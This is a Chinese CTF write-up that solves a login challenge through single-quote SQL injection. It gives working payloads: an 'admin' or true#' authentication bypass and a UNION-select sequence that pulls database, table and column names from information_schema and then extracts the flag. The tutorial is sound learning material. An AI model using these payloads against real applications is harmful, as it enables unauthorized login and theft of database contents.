题目
提示:这里描述项目中遇到的问题:
该题考察SQL注入漏洞,之前对SQL注入仅有部分了解,通过该题进行复习深入。
1. 首先判断是否可以进行SQL注入
进行SQL注入的方法有三种:
①整型注入
②单引号字符型注入
③双引号字符型注入
因为我们不知道该题设计哪一张方法,因此首先使用万能账号的方式来一种一种尝试。
关于万能账密,不是一个真实的账号,而是一个100%正确的账号,通过服务器验证。比如admin or true# ,其中#是将后面内容进行注释。该账号是100%正确的,且密码被注释,所以我们任意输入密码即可。
尝试发现使用admin’ or true# 账号可以生效,即单引号字符型注入
。
2. 进行SQL注入以获取flag
SQL注入的攻击顺序为:获取库名,获取表名,获取列名,获取数据(SQL)
本次使用的是联合注入
的方式。
前述操作将查询到的用户名显示出来,观察到有显示位后,我们使用联合注入进行脱库:
首先,对回显位置进行定位,即获取查询的列数和注入点。
在用户名栏键入下面代码:
admin' union select 1,2,3 #
密码键入任意值
由此我们知道该数据库有三列,并且注入点是第二列。我们直接抓取当前使用的数据库的库名:
在用户名栏键入:
admin' union select 1,database(),3 #
密码依然是任意值
获得库名之后下一步要获得表名,因此我们进行脱表操作,在用户名栏键入:
admin' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema='web2') ,3 #
密码仍然是任意值
显示出了web2库下的两个表名flag和user,获得表后下一步我们需要获得列。
在用户名栏键入:
admin' union select 1, (select group_concat(column_name) from information_schema.columns where table_schema='web2' and table_name='flag'),3 #
密码是任意值
可以看到flag表中有一个flag列。
最后对flag列的数据进行抓取,在用户名栏键入:
admin' union select 1,(select flag from flag),3 #
密码是任意值
得到了我们的flag,将flag进行提交,显示答案正确。
tips
- union联合查询是为了判断SQL语句中哪个地方可以被代替,代替的地方是可以在网页上显示出来的。
{ 例:若 select 1,2,3; 中的2这个地方可以被代替,我们就可以通过一些SQL语句或数据库函数(如database())来代替2的位置,让自己需要查询到的信息显示到网页上。}- group_concat函数用于将一个分组内的多行数据合并成一个字符串,并以指定的分隔符进行分隔。常用于需要将一个分组内的多条数据以字符串的形式展示的情况。
- 什么是information_schema
information_schema提供了对数据库元数据、统计信息、以及有关MySQL Server的信息访问(例如:数据库名或表名,字段的数据类型和访问权限等)。该库中保存的信息也可以称为MySQL的数据字典或系统目录。